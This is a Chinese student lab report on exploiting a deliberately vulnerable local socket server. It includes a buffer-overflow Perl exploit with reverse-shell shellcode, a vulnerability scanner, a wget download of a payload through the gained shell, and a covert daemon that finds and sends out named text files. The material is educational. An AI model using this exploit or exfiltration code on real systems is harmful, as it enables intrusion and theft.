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实验内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left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67960" cy="2797810"/>
            <wp:effectExtent l="0" t="0" r="508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实验环境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Windows10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Oracle VM VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/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Ubuntu 18.10   64bit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/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gcc version 8.2.0 (Ubuntu 8.2.0-7ubuntu1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/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Python 3.8.2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/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需要关闭地址随机化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/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sudo sh -c "echo 0 &gt; /proc/sys/kernel/randomize_va_space"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/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8"/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使用本地127.0.0.1的端口模拟局域网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lsof -i: 12345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sudo netstat -ntulp |grep 23232</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   获取daemon进程的pid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kill -9 12345</w:t>
      </w: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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>实验步骤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整体流程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服务端运行 myserver，可以翻转并发送收到的字符串，具有缓冲区溢出漏洞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Attacker 运行 normalcli，连接myserver，可以正常发送字符串并接受翻转后的字符串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attack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获取攻击信息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Attacker运行 exploitscan 扫描有缓冲区溢出漏洞的服务器（127.0.0.1:12345）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Attacker根据溢出数组的位置修改 attack.pl，运行attack.pl，攻破myserver，获取remote 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可以利用whoami查看身份，利用wget上传文件。利用 vi liuqiang.txt创建有名字的txt文件。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Attacker上传daemon到server，运行daemon。然后本地运行getfile，获取daemon扫描并传输的文件名包含liuqiang的txt文件。这里是明文传输，有MD5校验。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Attacker运行initkey生成两对RSA传输秘钥，daeprivate.pem，daepublic.pem，attpublic.pem，attprivate.pem。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Attacker设置128位（16个字符）AES加密秘钥，在key.txt、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Attacker上传getkey，daemon，cryptdaemon.py，以及RSA秘钥 daeprivate.pem，daepublic.pem，attpublic.pem。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利用获取的shell，Server运行getkey，attacker运行sendkey，将AES加密秘钥安全的发送到server端。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利用shell，server端运行cryptdaemon。Attacker端运行cryptgetfile，获取cryptdaemon扫描并传输的文件名包含liuqiang的txt文件。这里是密文传输，有MD5校验，加密方式是AES,EBC。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任务一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使用C++，SOCKET编程设计服务端程序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源码在 sourcecodes 文件夹，myserver.cpp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Main函建立服务器，并有错误处理，接收字符串，调用process_requst显示，调用reverse翻转字符串，然后返回。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错误处理包括端口占用，处理客户端断开等。见注释。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输出客户端的地址，端口信息。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>int main() {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std::cout &lt;&lt; "server on" &lt;&lt; std::endl;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// socket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int listenfd = socket(AF_INET, SOCK_STREAM, 0);  //listenfd 服务器socket描述字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if (listenfd == -1) {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std::cout &lt;&lt; "Error: socket" &lt;&lt; std::endl;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return 0;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}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// bind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struct sockaddr_in addr;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addr.sin_family = AF_INET;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addr.sin_port = htons(12345);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//addr.sin_addr.s_addr = INADDR_ANY; //INADDR-ANY local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addr.sin_addr.s_addr=inet_addr("127.0.0.1");   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if (bind(listenfd, (struct sockaddr*)&amp;addr, sizeof(addr)) == -1) {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std::cout &lt;&lt; "Error: bind" &lt;&lt; std::endl;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return 0;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}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// listen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if(listen(listenfd, 5) == -1) {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std::cout &lt;&lt; "Error: listen" &lt;&lt; std::endl;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return 0;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}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// accept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int conn;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char clientIP[INET_ADDRSTRLEN] = "";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struct sockaddr_in clientAddr;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socklen_t clientAddrLen = sizeof(clientAddr);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while (true) {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std::cout &lt;&lt; "...listening" &lt;&lt; std::endl;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conn = accept(listenfd, (struct sockaddr*)&amp;clientAddr, &amp;clientAddrLen);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if (conn &lt; 0) {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    std::cout &lt;&lt; "Error: accept" &lt;&lt; std::endl;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    continue;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}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inet_ntop(AF_INET, &amp;clientAddr.sin_addr, clientIP, INET_ADDRSTRLEN);//二进制转化为点分十进制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std::cout &lt;&lt; "...connect " &lt;&lt; clientIP &lt;&lt; ":" &lt;&lt; ntohs(clientAddr.sin_port) &lt;&lt; std::endl;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char buf[332];  // 容量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while (true) {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    memset(buf, 0, sizeof(buf));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>extern int errno;  //错误标志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    int len = recv(conn, buf, sizeof(buf), 0);//recv 而不是write，不会一直等待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    buf[len] = '\0';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    if (strcmp(buf, "quit") == 0) {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        std::cout &lt;&lt; "...disconnect " &lt;&lt; clientIP &lt;&lt; ":" &lt;&lt; ntohs(clientAddr.sin_port) &lt;&lt; std::endl;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        break;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    }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>if(len&lt;=0){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if(errno != EINTR)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        std::cout &lt;&lt; "...disconnect " &lt;&lt; clientIP &lt;&lt; ":" &lt;&lt; ntohs(clientAddr.sin_port) &lt;&lt; std::endl;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        break;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>}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    printf("received %s\n",buf);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    process_request(conn,buf);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>reverse(conn,buf);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}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    close(conn);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}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close(listenfd);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  return 0;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>}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Process_request复制展示原始字符串。strcpy原始字符串并打印。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left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这里strcpy即为利用的缓冲区溢出漏洞点，原始字符串超过256字节会溢出。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reverse翻转字符串。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void reverse(int s1,char * reply){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for(int i=0,j=strlen(reply)-1;i&lt;j;i++,j--){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    char c=reply[i];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reply[i]=reply[j];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    reply[j]=c;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}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send (s1, reply, strlen(reply),0);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}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int process_request (int s1, char *reply)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{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char result[256];  //exploit address= &amp;result+16  (rbp+rip)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strcpy (result, reply);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send(s1, result, strlen(result),0);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printf ("Result: %p\n", &amp;result);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return 0;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然后设计客户端验证服务端功能：normalcli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使用python编写，源代码见source codes文件夹 normalcli.py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功能就是简单的socket链接myserver，接收attacker输入字符串，发送该字符串，接收返回。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当输入字符串为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attack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时会提示如何攻击。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输入quit退出连接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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# 扫描端口 python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import socket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import os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import subprocess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print("客户端开启")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# 创建套接字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mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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host = '127.0.0.1'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port = 12345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try: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mySocket.connect((host, port))  ##连接到服务器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print("连接到服务器")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except:  ##连接不成功，运行最初的ip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print('连接不成功')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while True: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# 发送消息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msg = input("客户端发送:")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if msg == "attack":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    print("wait until this process exit and use attack.pl to get remote shell!!")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    msg="quit"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    mySocket.send(msg.encode(encoding='utf-8'))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    mySocket.close()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    print("程序结束\n")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    exit()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    #这样不可行，因为排队的缘故python连接不结束perl的连接不能执行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#subprocess.call(["perl", "/home/erio/Desktop/attack.pl"])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    #os.system("pause")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mySocket.send(msg.encode(encoding='utf-8'))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print("发送完成")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if msg == "quit":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    mySocket.close()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    print("程序结束\n")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    exit()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# 接收消息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msg = mySocket.recv(len(msg))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print("客户端接收,origin：%s" % msg.decode("utf-8"))  # 把接收到的数据进行解码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msg = mySocket.recv(len(msg))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print("客户端接收,reversed：%s" % msg.decode("utf-8"))  # 把接收到的数据进行解码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print("读取完成")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="00000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print("程序结束\n")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运行如图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Server端运行myserver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Attacker端运行normalcli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成功完成字符串翻转功能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完成任务一。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577840" cy="2241550"/>
            <wp:effectExtent l="0" t="0" r="0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任务二</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left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设计缓冲区溢出漏洞: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在myserver中漏洞如下，process_request会调用strcpy，复制客户端传来的字符串到result，result256字节，当传来的字符串s1超过256字节会溢出向上覆盖rbp，rip。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修改rip到shellcode即可。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>int process_request (int s1, char *reply)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>{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char result[256];  //exploit address= &amp;result+16  (rbp+rip)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strcpy (result, reply);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send(s1, result, strlen(result),0);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printf ("Result: %p\n", &amp;result);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 xml:space="preserve">  return 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="000000"/>
        <w:jc w:val="left"/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clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}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8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任务要求扫描有漏洞的服务器：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代码如下,先多线程扫描开放端口（模拟局域网多台主机），然后对开放的端口发送字符串，达到一定长度崩溃，认为有设计好的漏洞。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源代码设定扫描范围为 127.0.0.1：  12000-13000.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先扫描得到开放端口，再对开放的端口发送数据 。当溢出时提示用户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细节见注释。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8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exploitscan.py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socket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time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扫描127.0.0.1开放的端口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用端口模拟局域网的主机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get_ip_status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portlist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server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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server.connect((ip,port))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portlist.append(port)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{0}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port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{1}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is open'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.format(ip, port))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err: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{0}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port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{1}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is not open'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.format(ip,port))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server.close()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对开放的端口（相当于服务器），逐个攻击，发送字符串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假设有缓冲区溢出漏洞的服务器，缓冲区size小于1024字节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发送64-1024字节，如果过程中连接中断，认为服务器发生了栈溢出，说明该服务器为具有设计好的漏洞的机器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打印中断链接时的 A的个数，可以判断出缓冲区大小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达到1024字节还不溢出认为没有该漏洞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stackov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portlist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port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portlist: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server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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server.connect((ip,port))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{0}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port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{1}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is undertesting'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.format(ip, port))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ovstr=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i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#假定，缓冲区溢出范围在64-1024字节，逐个尝试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msg=ovstr+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server.send(msg.encode(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encoding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'utf-8'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"count A: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% i)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把接收到的数据进行解码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ovstr=ovstr+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time.sleep(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server.close()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'finished'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__name__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'__main__'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portlist=[]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host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'127.0.0.1'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port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12300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get_ip_status(host,port,portlist)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stackov(host,portlist)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8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8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由漏洞结构可知，payload应该为nop+shellcode+address。Address为shellcode（payload）起始地址。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攻击思路：编写 attack.pl  perl脚本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Socket连接服务器，发送payload，payload中address覆盖process_request的rip，跳转到shellcode。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Shellcode获取远程shell: 将server的标准输入输出（文件标识符），stderr重定向到socket连接的文件标识符，重定向到attacker，使用 execv ("/bin/sh", NULL)获取一个shell。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这样有一系列IO handler返回，使用IO:Select处理返回的Handler，循环读取，当有内容返回（stdout，stderr）时输出在屏幕，有内容输入（stdin）将输入发送到server，否则显示一个prompt。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这样就利用原有socket连接构成一个远程shell。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code将标准输入输出（文件标识符）重定向到socket连接的思路：因为linux中文件标识符编号是按顺序来的，所以获取上一个文件标识符编号(使用dup(0)新建一个标识符，-1就是上一个标识符)，就得到了socket的文件标识符，然后标准输入输出以及stderr重定向到socket即可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然后获取一个shell，使用 execv ("/bin/sh", NULL);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C代码如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="000000"/>
        <w:bidi w:val="0"/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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto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 w:themeColor="background1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>int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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t> sck = dup (0) - 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="000000"/>
        <w:bidi w:val="0"/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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">dup2 (sck, 0); dup2 (sck, 1); </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="000000"/>
        <w:bidi w:val="0"/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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">dup2  (sck, 2); </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="000000"/>
        <w:bidi w:val="0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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>execv ("/bin/sh", NULL);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转换成汇编然后加入到payload。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然后是溢出地址address的获取，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8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获取溢出地址复杂一点的方法：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使用gdb调试 myserver :   gdb ./myserver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81500" cy="85344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在strcpy前加断点 b 27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743200" cy="19507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使用normalcli发送meowdance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/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74422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暂停后使用find neowdance查询字符串位置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继续运行，c，打印result地址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927860" cy="124206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计算可知二者差距 272字节，由于gdb调试和实际地址有偏差，获取实际运行的server的result的地址+272即得到实际的address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8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为了方便获取实际运行的result地址，在server添加了打印，直接+272即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4084320" cy="101346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0x7fffffffdb80+272得到 0x7fffffffdc90 修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="881380"/>
            <wp:effectExtent l="0" t="0" r="508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</w:pP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获取溢出地址简单的方法：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由于设计的溢出数组result大小为256字节，加上rbp，rip16字节，256+16=272字节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8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只需要获取实际运行的result的地址+272即为要覆盖的address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然后是payload长度，总长度为256+8+8==sizeof(result)+rbp+rip。这样除了shellcode和address占用的空间，其他空间填nops即可。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完整的attack.pl如下。其中可见 addr，shellcode，payload的构造，以及socket，IO:Select的运用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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#!/usr/bin/perl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use IO::Select;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use IO::Socket::INET;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$|=1;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print "Remote Exploit";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print "Liuqiang learned from 0x00sec :)\n\n";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# You may need to calculate these magic numbers for your system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$addr = "\x90\xdc\xff\xff\xff\x7f\x00\x00";   #addr是攻击的溢出数组result的地址+272(110).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$off = 264;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# Generate the payload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$shellcode = "\x48\x31\xc0\x50\x50\x50\x5e\x5a\x50\x5f\xb0\x20\x0f\x05\x48\xff\xc8\x50\x5f\xb0\x21\x0f\x05\x48\xff\xc6\x48\x89\xf0\x3c\x02\x75\xf2\x52\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x52\x5e\xb0\x3b\x0f\x05";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$nops = $off - length $shellcode;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$payload = "\x90" x $nops . $shellcode . $addr;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$plen = length $payload;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$slen = length $shellcode;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print "SLED $nops Shellcode: $slen Payload size: $plen\n";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# Connect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my $socket = new IO::Socket::INET (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PeerHost =&gt; '127.0.0.1',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PeerPort =&gt; '12345',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Proto =&gt; 'tcp',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);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# Set up select for asynchronous read from the server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$sel = IO::Select-&gt;new( $socket );  #创建新对象，使用socket初始化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$sel-&gt;add(\*STDIN); #对象中增加一个 stdin 句柄用于输入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# Exploit!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$socket-&gt;send ($payload);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$socket-&gt;recv ($trash,1024);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$timeout = .1;  #0.1   s为单位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$flag = 1; # Just to show a prompt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#https://perldoc.perl.org/IO/Select.html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#https://blog.csdn.net/weixin_33910137/article/details/92780845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# 使用select 使用户可以处理IO HANDLE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# 下面的程序，if (@ready = $sel-&gt;can_read ($timeout))，有IO，进入if，判断是socket还是增加的 $sel-&gt;add(\*STDIN)。else没有IO，输出一个prompt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# Interact!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while (1) {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if (@ready = $sel-&gt;can_read ($timeout))  {#0.1s取一次，没有返回就跳到else显示提示符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foreach $fh (@ready) { #foreach loop ready。$sel-&gt;can_read ($timeout) 返回一系列句柄。相当于数组读取，读到$fh。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 xml:space="preserve">    $flag =1;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 xml:space="preserve">    if($fh == $socket) { # 如果是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$socket-&gt;recv ($resp, 1024);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print $resp;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 xml:space="preserve">    }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 xml:space="preserve">    else { # It is stdin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$line = &lt;STDIN&gt;;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$socket-&gt;send ($line);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 xml:space="preserve">    }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}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}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/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else { # Show the prompt whenever everything's been read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print "0x00pf]&gt;  " if ($flag);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$flag = 0;</w:t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 }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="000000"/>
        <w:bidi w:val="0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任务二还要求创建 含有名字的txt，当获取remote shell后，vi liuqiang.txt并保存即可创建。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服务端先运行myserver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Attacker先扫描有漏洞的服务器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 ./exploitscan  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52900" cy="77724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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2560320" cy="102870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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2857500" cy="100584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攻击12345端口时服务器崩溃，说明该服务器具有设计好的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3543300" cy="131826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上面扫描出漏洞服务器地址 127.0.0.1:12345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然后修改attack.pl中address，方法见上方，然后attacker端运行 perl attack.pl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可见利用漏洞成功，获取shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2980055"/>
            <wp:effectExtent l="0" t="0" r="4445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然后创建liuqiang.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4686300" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="762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34640" cy="88392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完成任务二。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任务三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先设计扫描名称含有我名字的txt文件，并发送的daemon程序。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Daemon程序是指守护者进程，在系统 启动就运行，系统关闭才停止的进程，独立于终端之外，不与客户端交互。一般进程在关闭终端后就停止了，而daemon进程不会停止。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创建daemon进程需要的步骤：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step 1.创建子进程，父进程退出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step 2.在子进程中创建新会话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step 3.改变当前目录为根目录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step 4.重设文件权限掩码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step 5.关闭文件描述符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可以直接用C++的函数创建，但是因为编写扫描和发送txt文件用python比较方便，采用python编写。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Daemon.py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框架如下，细节见注释。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会将run函数变为守护者进程运行。只需要填写修改run()函数为扫描，发送的功能函数即可。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socket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os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hashlib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time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createDaemon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os, sys, time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#产生子进程，而后父进程退出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pid = os.fork()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pid &gt;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:sys.exit(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OSError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error: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#print('fork')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sys.exit(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#修改子进程工作目录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os.chdir(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"/"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#创建新的会话，子进程成为会话的首进程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os.setsid()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#修改工作目录的umask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os.umask(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#创建孙子进程，而后子进程退出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pid = os.fork()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pid &gt;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#print("Daemon PID %d"%pid)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sys.exit(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OSError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error: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#print("fork")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sys.exit(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run()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__name__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'__main__'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createDaemon()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然后设计扫描函数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这里假定/home 为根目录，使用python 的os模块，每次扫描当前目录的文件夹和文件，文件夹继续加入扫描队列，文件判断是不是含有 刘强（liuqiang），是不是txt文件，若是则将完整路径加入results列表。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类似于bfs搜索。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搜索文件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dir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'/home'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#这里认为home是根目录//可以根据需要自行调整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specify_str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'liuqiang'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spec_type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'.txt'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搜索指定目录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results = []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folders = [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dir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folder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folders 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把目录下所有文件夹存入待遍历的folders  遍历当前文件夹所有文件名，加到folder，判断是否是文件夹（isdir），是则加入到文件夹列表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folders += [os.path.join(folder, x)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x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os.listdir(folder) \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os.path.isdir(os.path.join(folder, x))]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把所有满足条件的文件的相对地址存入结果results  是文件（isfile）且含特定字符串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results += [os.path.relpath(os.path.join(folder, x),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dir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\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x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os.listdir(folder) \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os.path.isfile(os.path.join(folder, x))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specify_str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x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spec_type==os.path.join(folder, x)[-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:]]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输出结果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#for result in results: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#print(result)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results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然后设计发送函数，使用socket发送，设立服务器，等待attacker链接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读取results列表，得到文件路径，先发送文件名，再发送文件大小，再发送文件内容，最后发送文件内容MD5校验值。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发送完毕关闭链接。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可能文件会被修改，所以即使数量不变也重新发送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senddd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发送文件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dir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'/home'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#这里认为home是根目录//可以根据需要自行调整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server = socket.socket()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server.bind((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"localhost"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23232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绑定监听端口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server.listen(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监听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#print("监听开始..")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   while True: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conn, addr = server.accept()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等待连接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#print("conn:", conn, "\naddr:", addr)  # conn连接实例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i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   while True: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data = conn.recv(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接收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data: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客户端已断开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#print("客户端断开连接")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tempfilename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results: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!=os.path.exists(os.path.join(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dir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,tempfilename )):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#如果在被搜索到而在被发送前就被删除了，打开文件会错误，所以跳过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continue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0. 发送文件名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filename=os.path.join(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dir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,tempfilename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conn.send(filename.encode(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发送文件名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#print("filename:", filename)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conn.recv(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接收确认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1.先发送文件大小，让客户端准备接收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size = os.stat(filename).st_size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#获取文件大小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conn.send(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(size).encode(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发送数据长度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#print("发送的大小：", size)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conn.recv(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接收确认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2.发送文件内容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m = hashlib.md5()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f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(filename,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"rb"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line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f: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conn.send(line)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发送数据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m.update(line)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f.close()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3.发送md5值进行校验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md5 = m.hexdigest()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conn.send(md5.encode(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发送md5值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#print("md5:", md5)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conn.recv(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接收确认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time.sleep(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#否则接收方可能受到md5+下一个文件的内容/文件名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server.close()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考虑到文件可能会更新修改，每隔五秒扫描一次，然后等待连接发送。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results=search()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senddd(results)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time.sleep(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考虑到秘密性不输出任何信息。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相应的在attacker端编写接收文件的程序 getfile.py。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链接daemon开启的socket服务器，按文件名，大小，内容，MD5值顺序接收，最后比较MD5值确认发送无误。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文件名在接收后加上时间戳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socket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os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hashlib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time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"新一轮接收开始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client = socket.socket()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生成socket连接对象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ip_port =(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"localhost"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23232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地址和端口号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client.connect(ip_port)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连接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"服务器已连接"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msg=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'read to recv'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client.send(msg.encode(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传送和接收都是bytes类型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0. 接受文件名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server_response = client.recv(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       if not server_response:  # 可能跳过了一次文件发送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               continue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file_name = server_response.decode(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"文件名："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file_name)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client.send(msg.encode(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#发送确认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1.先接收长度，建议8192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server_response = client.recv(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file_size =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(server_response.decode(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"接收到的大小："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file_size)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client.send(msg.encode(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#发送确认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2.接收文件内容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client.send(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"准备好接收"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接收确认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nowtime = time.strftime(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"%Y-%m-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-%H-%M-%S"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time.localtime())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filename = file_name[:-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+nowtime+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'.txt'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f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(filename,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"wb"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received_size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m = hashlib.md5()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received_size &lt; file_size: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size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准确接收数据大小，解决粘包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file_size - received_size &gt;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多次接收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size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最后一次接收完毕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size = file_size - received_size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data = client.recv(size)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多次接收内容，接收大数据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data_len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(data)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received_size += data_len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"已接收："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(received_size/file_size*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m.update(data)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f.write(data)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f.close()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"实际接收的大小:"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received_size)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解码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3.md5值校验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md5_sever = client.recv(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).decode(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md5_client = m.hexdigest()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client.send(msg.encode(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#发送确认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"服务器发来的md5:"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md5_sever)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"接收文件的md5:"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md5_client)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md5_sever == md5_client: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"MD5值校验成功"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"MD5值校验失败"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"当前轮接受结束，daemon进入下一次探测阶段;5S后可再次连接获取文件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运行如下：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先利用任务二获取的shell，传送daemon程序到server端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在attacker安装启动ftp服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8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在获取的remoteshell使用wget下载daemon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</w:rPr>
        <w:t>wget -nH -P /home/</w:t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erio/Desktop/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>serverf</w:t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/ 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</w:rPr>
        <w:t>ftp://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127.0.0.1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</w:rPr>
        <w:t>//home/</w:t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erio/Desktop/attacker/daemon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8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注意需要修改ftp配置文件允许匿名登录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Server端运行daemon。使用获取的shell。这里为了方便直接演示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282440" cy="65532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然后attacker端运行 getfile。可见传输过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4556760" cy="3299460"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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对比可见无误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3832860" cy="1234440"/>
            <wp:effectExtent l="0" t="0" r="762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181600" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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任务四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任务三中daemon和getfile之间传输是明文传输，任务四要求密文传输。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设计思路：使用AES EBC加密明文，其中AES秘钥用RSA加密传输。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先在attacker端生成两对RSA秘钥:daepublic.pem，daeprivate.pem，attpublic.pem,attprivate.pem。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然后用户输入128位（16 chars）的AES初始化秘钥到key.txt。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daepublic.pem，daeprivate.pem，attpublic.pem通过任务二获取的shell传输到server端。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然后利用RSA加密传输AES秘钥，过程如下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# 1 attacker发送随机数N1+attacker的身份信息IDA，用的 dae的公钥加密,发送给daemon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# 2 deamon收到后，生成随机数N2，用attacker的公钥加密N1，N2，发送给attacker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# 3 A 收到后。用dae的公钥加密发送N2给daemon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# 4 A继续发送，   先用a的私钥对AES对称秘钥签名，然后用dae的公钥加密发给dea</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="630" w:firstLineChars="30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dea解密得到AES对称秘钥及签名，验证签名是attacker后，保存该秘钥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这样的秘钥传输安全性证明如下：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IDA是公共可以获取的，比如attac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ker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和其他人通信也用ID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Attacker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但是第二步包含第一次的N1，只有dea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mon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能获取N1，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步骤2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中间人无法破解得到N1,N2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即使中间人用IDA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ttacker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和另一个随机数冒充A发给dea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mon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得到另一个N22，得不到N1，也就欺骗不了Attac，此时最多欺骗dea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mon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自己是attac  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两次加密一次是pubatt，一次是pubdea，中间人无法用第一次的获取的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N1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密文冒充第二次的N1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+N2密文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步骤三 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只有发送N2的才会被认为是A，这一步进一步的确认Attac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ker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，但是中间人还是可以冒充Attac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ker。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步骤四 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priA签名，确实是A发的对称秘钥，不是中间人冒充的A; 这样即使上面中间人欺骗了dea，自己是attac，那么dea在这一步可以验证是不是attac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ker。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中间人最多只能在外层的pub dea加密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继续冒充attacker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内部没有attacker签名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，解不出来符合规范的对称秘钥，dea可以识破中间人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同时如果中间传输因为网络问题出现错误，那么daemon解密和验证签名一般也会出错，这样确保秘钥的完整性。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这样过程后，只有daemon和attacker有AES加密的秘钥。并且防止中间人欺骗正常通信的双方，保证传输秘钥的完整性。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加密传输过程：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daemon利用该秘钥进行AES EBC 加密，加密文件名，大小，文件内容，即可。MD5校验值不需要加密。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程序实现：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设计sendkey，getkey程序，分别在attacker，daemon端运行，完成上述秘钥传输流程。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Getkey.py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建立socket服务器，步骤一接收N1+IDAttacker密文，解密验证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步骤二 发送N1+N2密文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步骤三验证 N2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步骤四接收AES key的密文，解密，验证签名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最后验证成功，则保存key到hello.log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socket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os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random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rsa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chardet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#with 